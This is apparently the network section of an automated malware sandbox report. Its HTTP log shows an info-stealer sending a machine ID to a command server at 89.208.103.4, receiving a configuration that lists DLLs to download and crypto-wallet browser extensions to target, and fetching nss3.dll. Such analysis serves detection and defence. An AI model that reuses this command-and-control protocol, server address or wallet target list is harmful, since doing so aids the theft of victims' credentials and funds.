Aug 11, 2022 06:57:10.207650900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207679987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.207690954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207750082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.211107969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.211163044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.211193085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.211210966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.211215973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.211252928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.211263895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.211297989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.211304903 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.211369991 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.211786985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.211824894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.211884022 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.211949110 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.212613106 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.213365078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.213445902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.213515997 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.213746071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.214402914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.214442968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.214452982 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.214488029 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.215986013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.216062069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.216134071 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.216171980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.216222048 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.216981888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.217194080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.217263937 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.218139887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.218182087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.218219995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.218245029 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.218267918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.219136000 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.219176054 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.219242096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.220192909 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.220232964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.220269918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.220309019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.220338106 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.220737934 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.220798016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.220834017 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.220855951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.220871925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.220882893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.220910072 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.220916986 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.221115112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.222887039 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.222924948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.222944975 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.222961903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.222974062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.223000050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.223023891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.223046064 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.223051071 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.223071098 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.223093033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.223123074 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.223133087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.223150015 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.223170996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.223180056 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.223208904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.223217964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.223253965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229176044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229216099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229252100 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229280949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229290009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229314089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229326963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229351997 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229365110 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229404926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229412079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229435921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229440928 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229440928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229480982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229497910 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229518890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229530096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229557037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229573965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229594946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229603052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229635954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229640961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229674101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229681015 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229712963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229720116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229749918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229756117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229787111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229794979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229825020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229845047 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229860067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229871035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229897976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229902983 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229934931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229942083 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.229971886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.229978085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.230010986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.230016947 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.230046988 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.230053902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.230084896 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.230088949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.230122089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.230127096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.230156898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.230166912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.230194092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.230201960 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.230232000 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.230238914 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.230285883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.230293989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.230324030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.230331898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.230360985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.230370998 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.230401039 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.230412006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.230434895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.230452061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.230480909 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.730874062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.730968952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.756076097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.756474018 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:11.350249052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:11.350358009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:12.418275118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:12.484082937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:12.542366028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:12.542476892 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:15.959556103 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:15.959640026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:15.983443022 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:15.983771086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:15.983803988 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:15.983911037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:15.984015942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:15.984266043 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:15.984296083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:15.984359980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:15.984400034 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:15.984771967 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:15.984867096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:16.008115053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.008280039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:16.008524895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.008564949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.008591890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.008779049 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:16.009061098 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.009088993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.009114981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.009145975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.009562016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.009591103 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.009618044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.010046959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.033535957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.034488916 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.034521103 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.034939051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.034967899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.035458088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.100912094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:16.101001978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:16.897794008 CEST	49736	80	192.168.2.3	89.208.103.4

HTTP Request Dependency Graph

89.208.103.4

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49736	89.208.103.4	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:57:07.043612003 CEST	788	OUT	POST / HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: mozzzzzzzzzzz Host: 89.208.103.4 Content-Length: 94 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 68 61 72 64 7a 26 63 6f 6e 66 69 67 49 64 3d 63 37 38 33 64 31 36 36 64 37 30 66 33 33 32 62 37 32 38 30 33 30 65 38 36 32 62 38 32 39 65 38 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a\|user&configId=c783d166d70f332b728030e862b829e8
Aug 11, 2022 06:57:07.164103985 CEST	791	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Aug 2022 04:57:07 GMT Content-Type: text/html; charset=utf-8 Content-Length: 5480 Connection: keep-alive Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"1568-kyzrSzbz5mowvP5Ir8dWbIL7LWw" Data Raw: 6c 69 62 73 5f 6e 73 73 33 3a 68 74 74 70 3a 2f 2f 38 39 2e 32 30 38 2e 31 30 33 2e 34 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6e 73 73 33 2e 64 6c 6c 0a 6c 69 62 73 5f 6d 73 76 63 70 31 34 30 3a 68 74 74 70 3a 2f 2f 38 39 2e 32 30 38 2e 31 30 33 2e 34 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6d 73 76 63 70 31 34 30 2e 64 6c 6c 0a 6c 69 62 73 5f 76 63 72 75 6e 74 69 6d 65 31 34 30 3a 68 74 74 70 3a 2f 2f 38 39 2e 32 30 38 2e 31 30 33 2e 34 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c 0a 6c 69 62 73 5f 6d 6f 7a 67 6c 75 65 3a 68 74 74 70 3a 2f 2f 38 Data Ascii: libs_nss3:http://89.208.103.4/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dlllibs_msvcp140:http://89.208.103.4/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlllibs_vcruntime140:http://89.208.103.4/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dlllibs_mozglue:http://8
Aug 11, 2022 06:57:07.164133072 CEST	793	IN	Data Raw: 39 2e 32 30 38 2e 31 30 33 2e 34 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6d 6f 7a 67 6c 75 65 2e 64 6c 6c 0a 6c 69 62 73 5f 66 72 65 65 62 6c 33 3a 68 74 74 70 3a 2f 2f 38 39 2e 32 30 Data Ascii: 9.208.103.4/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dlllibs_freebl3:http://89.208.103.4/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dlllibs_softokn3:http://89.208.103.4/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dllews_meta_e:ejbalbakoplchlghe
Aug 11, 2022 06:57:07.164149046 CEST	794	IN	Data Raw: 66 62 65 6f 67 61 65 61 6f 65 68 6c 65 66 6e 6b 6f 64 62 65 66 67 70 67 6b 6e 6e 3b 4d 65 74 61 4d 61 73 6b 3b 4c 6f 63 61 6c 20 45 78 74 65 6e 73 69 6f 6e 20 53 65 74 74 69 6e 67 73 0a 73 73 74 6d 6e 66 6f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 2e Data Ascii: fbeogaeaoehlefnkodbefgpgknn;MetaMask;Local Extension Settingssstmnfo_System Info.txt:System Information: \|Installed applications:\|wlts_daedalus:Daedalus;26;Daedalus Mainnet;;log,cache,chain,dictionarwlts_mymonero:MyMonero;26;MyMonero;
Aug 11, 2022 06:57:07.164165020 CEST	795	IN	Data Raw: 78 3b 4c 6f 63 61 6c 20 45 78 74 65 6e 73 69 6f 6e 20 53 65 74 74 69 6e 67 73 0a 65 77 73 5f 73 6f 6c 6c 65 74 3a 66 68 6d 66 65 6e 64 67 64 6f 63 6d 63 62 6d 66 69 6b 64 63 6f 67 6f 66 70 68 69 6d 6e 6b 6e 6f 3b 53 6f 6c 6c 65 74 3b 4c 6f 63 61 Data Ascii: x;Local Extension Settingsews_sollet:fhmfendgdocmcbmfikdcogofphimnkno;Sollet;Local Extension Settingsews_clover:nhnkbkgjikgcigadomkphalanndcapjk;CloverWallet;Local Extension Settingsews_polymesh:jojhfeoedkpkglbfimdfabpdfjaoolaf;PolymeshWall
Aug 11, 2022 06:57:07.164180040 CEST	796	IN	Data Raw: 67 65 65 6f 64 70 66 61 67 6a 63 65 65 66 69 65 66 6c 6d 64 66 70 68 70 6c 6b 65 6e 6c 66 6b 3b 54 4f 4e 3b 4c 6f 63 61 6c 20 45 78 74 65 6e 73 69 6f 6e 20 53 65 74 74 69 6e 67 73 0a 65 77 73 5f 67 6f 62 79 3a 6a 6e 6b 65 6c 66 61 6e 6a 6b 65 61 Data Ascii: geeodpfagjceefieflmdfphplkenlfk;TON;Local Extension Settingsews_goby:jnkelfanjkeadonecabehalmbgpfodjm;Goby;Local Extension Settingsews_ton_ex:nphplpgoakhhjchkkhmiggakijnkhfnd;TON;Local Extension Settingsews_Cosmostation:fpkhgmpbidmiogeglndf
Aug 11, 2022 06:57:07.164192915 CEST	797	IN	Data Raw: 32 30 62 34 62 39 31 65 34 64 63 39 34 61 30 39 37 64 39 Data Ascii: 20b4b91e4dc94a097d9
Aug 11, 2022 06:57:07.185926914 CEST	809	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: qwrqrwrqwrqwr Host: 89.208.103.4 Connection: Keep-Alive Cache-Control: no-cache
Aug 11, 2022 06:57:07.238115072 CEST	859	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Aug 2022 04:57:07 GMT Content-Type: application/octet-stream Content-Length: 2042296 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:39:48 GMT ETag: "62543db4-1f29b8" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 53 57 56 8b Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL9b"!&`@A!\T@@xPhh\!@.texti `.rdata@@.dataN*@.00cfg0@@.rsrcx@@@.relochP@BUSWV
Aug 11, 2022 06:57:07.238140106 CEST	860	IN	Data Raw: 5d 0c 8b 75 08 8b 7e 0c 85 ff 74 40 8b 0d 70 e0 1d 10 ff 15 00 30 1e 10 57 ff d1 83 c4 04 8b 7e 0c 31 c0 85 db 0f 94 c0 c1 e0 08 48 89 46 44 85 ff 74 12 8b 0d 78 e0 1d 10 ff 15 00 30 1e 10 57 ff d1 83 c4 04 31 c0 5e 5f 5b 5d c3 31 c0 85 db 0f 94 Data Ascii: ]u~t@p0W~1HFDtx0W1^_[]1HFDUWVu3'u7=tal$`t:x(p,@0^_]~28wm$x($I"
